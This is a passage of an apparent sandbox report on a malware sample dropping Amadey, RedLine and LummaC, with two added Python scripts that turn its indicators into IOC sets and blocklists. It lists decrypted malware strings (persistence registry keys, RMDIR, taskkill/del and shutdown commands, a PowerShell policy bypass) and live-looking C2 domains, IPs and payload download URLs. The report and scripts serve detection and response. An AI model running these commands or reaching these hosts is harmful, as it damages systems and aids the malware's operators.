Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Startup
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: cmd /C RMDIR /s/q
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: rundll32
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Programs
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: %USERPROFILE%
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: cred.dll|clip.dll|
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: cred.dll
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: clip.dll
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: http://
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: https://
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: /quiet
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: /Plugins/
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: &unit=
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: shell32.dll
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: kernel32.dll
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: GetNativeSystemInfo
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: ProgramData\
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: AVAST Software
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Kaspersky Lab
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Panda Security
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Doctor Web
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: 360TotalSecurity
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Bitdefender
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Norton
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Sophos
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Comodo
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: WinDefender
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: 0123456789
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: ------
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: ?scr=1
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: ComputerName
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: -unicode-
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: VideoID
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: DefaultSettings.XResolution
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: DefaultSettings.YResolution
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: ProductName
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: CurrentBuild
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: rundll32.exe
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: "taskkill /f /im "
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: " && timeout 1 && del
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: && Exit"
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: " && ren
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Powershell.exe
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: -executionpolicy remotesigned -File "
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: shutdown -s -t 0
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: random
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: Keyboard Layout\Preload
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: 00000419
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: 00000422
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: 00000423
Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | String decryptor: 0000043f
Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp | String decryptor: arisechairedd.shop/JnsHY
Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp | String decryptor: begindecafer.world/QwdZdf
Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp | String decryptor: garagedrootz.top/oPsoJAN
Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp | String decryptor: modelshiverd.icu/bJhnsj
Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp | String decryptor: catterjur.run/boSnzhu
Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp | String decryptor: orangemyther.live/IozZ
Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp | String decryptor: fostinjec.today/LksNAz
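The AV verdicts, the configuration-extractor line and the string-decryptor output above are the report's indicators, but they are spread across three notations: a download URL, its IE cache copy and its Temp copy for each dropped file; the Amadey config as JSON; and bare host/path strings from the second process's decryptor. The block below is an added example, not Joe Sandbox's code: it folds such lines into one IOC set keyed by dropped-file name, accepts both the run-together form of the export ("random.exeAvira: detected") and the same line with a separator, and treats a decrypted string as a C2 indicator only when it has the host.tld/path shape. The sample lines are copied from this report; the normalisation rules (stripping the IE cache "[1]" suffix, dropping a trailing dot on a memory-string URL, keeping the Amadey C2 URL without a scheme as the extractor reports it) are the example's own.

```python
"""Fold this report's detection lines into one IOC set.  Added example for
this page, not Joe Sandbox code; SAMPLE_LINES are copied from the report."""
import json
import re
from pathlib import PureWindowsPath

LINE = re.compile(
    r"^Source:\s*(.+?)\s*\|?\s*"                              # source: sample, path, URL or memory dump
    r"(Avira URL Cloud|Avira|ReversingLabs|Virustotal|"        # detector name (longest alternative first)
    r"Malware Configuration Extractor|String decryptor):\s*(.*)$")
HOST_PATH = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+/\S+$")   # host.tld/path, the shape of the decrypted C2 strings
PCT = re.compile(r"(\d+)%")


def file_key(path_or_url):
    """'.../INetCache/.../PfOHmro[1].exe' and 'http://host/x/PfOHmro.exe' -> 'PfOHmro.exe'."""
    name = path_or_url.rstrip("/").rsplit("/", 1)[-1]         # last URL segment (no-op for a Windows path)
    name = PureWindowsPath(name).name                          # last Windows path component
    return re.sub(r"\[\d+\]", "", name)                        # IE cache numbering


def new_entry():
    return {"paths": set(), "urls": set(), "labels": set(), "max_detection": 0}


def extract_iocs(lines):
    iocs = {"urls": set(), "files": {}, "c2": {}}
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        source, detector, rest = m.groups()
        if detector == "Avira URL Cloud":
            url = source.rstrip(".")                           # memory strings sometimes carry a trailing '.'
            iocs["urls"].add(url)
            if url.lower().endswith(".exe"):
                iocs["files"].setdefault(file_key(url), new_entry())["urls"].add(url)
        elif detector == "Avira":
            label = rest.split("Label:", 1)[1].strip() if "Label:" in rest else rest.strip()
            entry = iocs["files"].setdefault(file_key(source), new_entry())
            entry["paths"].add(source)
            entry["labels"].add(label)
        elif detector in ("ReversingLabs", "Virustotal"):
            pm = PCT.search(rest)
            if pm:
                entry = iocs["files"].setdefault(file_key(source), new_entry())
                entry["paths"].add(source)
                entry["max_detection"] = max(entry["max_detection"], int(pm.group(1)))
        elif detector == "Malware Configuration Extractor":
            family, _, cfg_json = rest.partition(" ")
            cfg = json.loads(cfg_json)
            if "C2 url" in cfg:
                iocs["c2"][cfg["C2 url"]] = "%s config (%s)" % (family, source)
        elif detector == "String decryptor" and HOST_PATH.match(rest):
            iocs["c2"][rest] = "string decryptor (%s)" % source
    return iocs


SAMPLE_LINES = [  # copied from this report; one line given with a ' | ' separator to show both forms parse
    r"Source: random.exeAvira: detected",
    r"Source: http://176.113.115.7/files/5526411762/CgmaT61.exeAvira URL Cloud: Label: malware",
    r"Source: http://176.113.115.7/files/6691015685/V0Bt74c.exe.Avira URL Cloud: Label: malware",
    r"Source: http://176.113.115.7/files/7868598855/zY9sqWs.exeAvira URL Cloud: Label: malware",
    r"Source: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn",
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exeAvira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn",
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exeAvira: detection malicious, Label: TR/AVI.Amadey.itpsl",
    r"Source: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe | Avira: detection malicious, Label: TR/AVI.Amadey.itpsl",
    r"Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEAvira: detection malicious, Label: TR/Crypt.TPM.Gen",
    r'Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}',
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exeReversingLabs: Detection: 68%",
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exeReversingLabs: Detection: 73%",
    r"Source: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exeReversingLabs: Detection: 73%",
    r"Source: random.exeVirustotal: Detection: 48%",
    r"Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 176.113.115.6",
    r"Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: /Ni9kiput/index.php",
    r"Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: arisechairedd.shop/JnsHY",
    r"Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: garagedrootz.top/oPsoJAN",
]

if __name__ == "__main__":
    result = extract_iocs(SAMPLE_LINES)
    for name, entry in sorted(result["files"].items()):
        print(name, sorted(entry["labels"]), entry["max_detection"], sorted(entry["urls"]))
    print(sorted(result["urls"]))
    print(result["c2"])
```

Keying on the file name is what ties the three copies of each payload together: zY9sqWs.exe ends up with its download URL, its INetCache and Temp paths, the Avira label TR/AVI.Amadey.itpsl and the 68% ReversingLabs rate in one record. The Amadey C2 host and path also appear as separate decrypted strings, and neither passes the host.tld/path test on its own, so the C2 set holds the joined URL from the extractor once rather than two fragments.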

Phishing

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, type: DROPPED
Source: random.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49850 version: TLS 1.2
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000008.00000002.1319444757.00000287A8E77000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Hpdbtem.pdbe- source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Portals.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.Windows.Forms.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: mscorlib.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Through.pdb source: mAtJWNv.exe.14.dr, mAtJWNv[1].exe.14.dr
                                    Source: Binary string: mscorlib.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb) source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: RegAsm.pdb source: RegAsm.exe.41.dr
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe.41.dr
                                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Portals.pdbIL_STUB_PInvoke source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: b.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0048DBBE
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0045C2A2 FindFirstFileExW,0_2_0045C2A2
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004968EE FindFirstFileW,FindClose,0_2_004968EE
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0049698F
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D076
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D3A9
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00499642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00499642
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049979D
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00499B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00499B2B
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00495C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00495C97
                                    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
                                    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
                                    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\789919\
                                    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
                                    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\789919
                                    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

                                    Networking

                                    Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49715 -> 176.113.115.6:80
                                    Source: Network traffic | Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.4:49824 -> 185.125.50.8:80
                                    Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49824 -> 185.125.50.8:80
                                    Source: Network traffic | Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49847 -> 101.99.92.190:40919
                                    Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49847 -> 101.99.92.190:40919
                                    Source: Network traffic | Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 101.99.92.190:40919 -> 192.168.2.4:49847
                                    Source: Network traffic | Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49847 -> 101.99.92.190:40919
                                    Source: Network traffic | Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 101.99.92.190:40919 -> 192.168.2.4:49847
                                    Source: Network traffic | Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 101.99.92.190:40919 -> 192.168.2.4:49847
                                    Source: Malware configuration extractor | IPs: 176.113.115.6
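The six "String decryptor" entries above (the LummaC C2 hostnames recovered from process 0x31's memory) and the Suricata alerts and config-extractor IP in this section are the indicators a responder actually takes away from the report. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses those report lines (transcribed verbatim into the script, so it runs offline), separates the hostnames from the alerted IP:port endpoints, records each alert's direction relative to the analysis VM (192.168.2.4, taken from the alerts themselves; the prefix is a parameter), checks which config-extractor IP the IDS independently saw the sample contact, and emits a de-duplicated blocklist.

```python
"""Turn a sandbox report's indicator lines into a de-duplicated IOC set.

Added example, not part of the Joe Sandbox report: REPORT_LINES is a verbatim
transcription of the report's "String decryptor", "Suricata IDS" and
"Malware configuration extractor" entries; local_prefix defaults to the
analysis VM's 192.168.2.x address as seen in those alerts.
"""
import re
from collections import defaultdict

MEM = ("Source: 00000031.00000002.3270950302.0000000003549000.00000004."
       "00000800.00020000.00000000.sdmp")
NET = "Source: Network trafficSuricata IDS: "
REPORT_LINES = [
    MEM + "String decryptor: begindecafer.world/QwdZdf",
    MEM + "String decryptor: garagedrootz.top/oPsoJAN",
    MEM + "String decryptor: modelshiverd.icu/bJhnsj",
    MEM + "String decryptor: catterjur.run/boSnzhu",
    MEM + "String decryptor: orangemyther.live/IozZ",
    MEM + "String decryptor: fostinjec.today/LksNAz",
    NET + "2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49715 -> 176.113.115.6:80",
    NET + "2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.4:49824 -> 185.125.50.8:80",
    NET + "2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49824 -> 185.125.50.8:80",
    NET + "1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49847 -> 101.99.92.190:40919",
    NET + "2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49847 -> 101.99.92.190:40919",
    NET + "2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 101.99.92.190:40919 -> 192.168.2.4:49847",
    NET + "2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49847 -> 101.99.92.190:40919",
    NET + "2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 101.99.92.190:40919 -> 192.168.2.4:49847",
    NET + "2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 101.99.92.190:40919 -> 192.168.2.4:49847",
    "Source: Malware configuration extractorIPs: 176.113.115.6",
]

# The report's table cells arrive run together ("trafficSuricata"), so every
# pattern is searched, not anchored, and tolerates a missing or odd separator.
DECRYPT_RE = re.compile(r"String decryptor: (?P<host>[A-Za-z0-9.-]+)/(?P<path>\S*)")
SURICATA_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)")
CONFIG_RE = re.compile(r"Malware configuration extractor\W*IPs: (?P<ips>.+)")


def extract_iocs(lines, local_prefix="192.168.2."):
    """Group decrypted C2 hostnames, alerted remote endpoints and config IPs."""
    domains = defaultdict(set)      # host -> set of URL paths
    endpoints = defaultdict(list)   # "ip:port" -> alerts that named it
    config_ips = set()
    for line in lines:
        if m := DECRYPT_RE.search(line):
            domains[m["host"]].add("/" + m["path"])
        elif m := SURICATA_RE.search(line):
            outbound = m["src"].startswith(local_prefix)
            remote = (f"{m['dst']}:{m['dport']}" if outbound
                      else f"{m['src']}:{m['sport']}")
            endpoints[remote].append({
                "sid": int(m["sid"]), "severity": int(m["sev"]),
                "msg": m["msg"], "direction": "outbound" if outbound else "inbound"})
        elif m := CONFIG_RE.search(line):
            config_ips.update(ip.strip() for ip in m["ips"].split(","))
    return {"domains": dict(domains), "endpoints": dict(endpoints),
            "config_ips": config_ips}


def corroborated_c2(iocs):
    """Config-extractor IPs that the IDS also saw the sample talk to."""
    alerted = {ep.rsplit(":", 1)[0] for ep in iocs["endpoints"]}
    return iocs["config_ips"] & alerted


def blocklist(iocs):
    """Sorted, de-duplicated hostnames and IPs for a DNS/firewall blocklist."""
    hosts = (set(iocs["domains"])
             | {ep.rsplit(":", 1)[0] for ep in iocs["endpoints"]}
             | iocs["config_ips"])
    return sorted(hosts)


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_LINES)
    for ep, alerts in iocs["endpoints"].items():
        print(ep, [(a["sid"], a["direction"]) for a in alerts])
    print("config IP seen on the wire:", corroborated_c2(iocs))
    print("blocklist:", blocklist(iocs))
```

Direction matters when turning alerts into indicators: three of the six RedLine alerts fire on the server's response, so a naive "take the destination" rule would add the analysis VM to the blocklist. Keeping the URL paths alongside the hostnames preserves what LummaC actually requests, which is what a proxy or DNS-firewall rule can match on once the hostnames rotate.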
